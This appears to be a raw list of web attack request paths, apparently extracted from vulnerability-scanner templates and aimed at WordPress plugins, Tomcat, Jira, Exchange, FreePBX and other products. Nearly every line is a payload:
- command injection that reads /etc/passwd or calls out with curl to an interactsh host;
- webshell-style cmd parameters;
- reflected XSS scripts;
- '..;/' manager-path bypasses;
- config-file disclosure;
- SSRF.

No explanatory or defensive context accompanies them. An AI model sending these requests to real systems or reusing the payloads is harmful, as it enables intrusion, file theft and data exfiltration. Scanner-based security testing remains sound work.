
/dana-na/auth/url_default/welcome.cgi
/filemanager/upload.php
/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
/wp-json/visualizer/v1/upload-data
/installer/index.php
/roundcube/installer/index.php
/configWizard/keyUpload.jsp
/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#
/mbilling/lib/icepay/icepay.php?democ={{randstr}};sleep%207;#
/{{route}}
/WebInterface
/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}
/WebInterface/{{dirname}}/{{filename}}
/login?redir=/ng
/mftp/
/
/pbxcore/files/cache/{{extracted_path}}?{{wait_for(3)}}
/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x
/user/City_ajax.aspx?CityId=33
/tool/log/c.php?strip_slashes=md5&host={{randstr}}
/seeyon/thirdpartyController.do.css/..;/ajax.do
/defaultroot/officeserverservlet
/console/login/LoginForm.jsp
/poc.jsp/
/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/meta
/api/snapshots
/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/modules/blockwishlist/config.xml
/git/notifyCommit?url={{randstr}}&branches={{randstr}}
/api/sys/set_passwd
/cgi-bin/MANGA/index.cgi
/contact/
/contact-us/
/submit/
/support/
/form/
/get-in-touch/
/wp-admin/admin-ajax.php
/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt
/organization-setup
/ccm/system/panels/page/preview_as_user/preview?cID=
/lucees3ezf%3cimg%20src%3da%20onerror%3dalert(
/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert(
/login.php/
/ueditor/net/controller.ashx?action=catchimage&encode=utf-8
/service/~baseapp/UploadServlet
/laravel-filemanager?type=Files
/..;/manager/html
/..;/..;/manager/html;/
/..;/host-manager/html
/..;/..;/host-manager/html;/
/{{randstr}}/..;/manager/html
/{{randstr}}/..;/host-manager/html
/upload.jsp
/{{randstr}}.php
/RichWidgets/Popup_Upload.aspx
/{{randstr}}
/docs/introduction.html
/puppet-ca/v1/certificate_request/{{randstr}}
/Telerik.Web.UI.WebResource.axd?type=rau
/?s={{randstr}}&c={{randstr}}&a={{randstr}}&m={{randstr}}
/bin/wcm/contentfinder/connector/suggestions.json;%0aOJh.css?query_term=path%3a/&pre={{randstr}}
/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/remote/login?&err=--%3E%3Cscript%3Ealert(
/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C
/wp-content/plugins/nd-booking/readme.txt
/api/users
/?p={{post_id}}&0=echo+{{base64(string)}}|base64+-d
/?p={{post_id}}&0=type+C:\\windows\\win.ini
/?p={{post_id}}&0=type+..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
/wp-admin/admin-post.php?page=give-settings&stripe_publishable_key={{stripe_publishable_key}}&stripe_publishable_key_test={{stripe_publishable_key_test}}&stripe_user_id={{stripe_user_id}}&stripe_access_token={{stripe_access_token}}&stripe_access_token_test={{stripe_access_token_test}}&connected=1
/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E
/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F
/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E 
/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>
/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a
/s/{{randstr}}/_/;/WEB-INF/web.xml
/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E
/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x
/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x
/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY
/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707
/mod/lti/auth.php?redirect_uri=javascript:alert(
/templates/pages/debug_panel.php?id={{randstr}}
/autodiscover/autodiscover.json/v1.0/{{randstr}}@interact.sh?Protocol=Autodiscoverv1
/appliance/login?login[password]={{randstr}}%22%3E%3Csvg/onload=alert(document.domain)%3E&login[use_curr]=1&login[submit]=Change%20Password
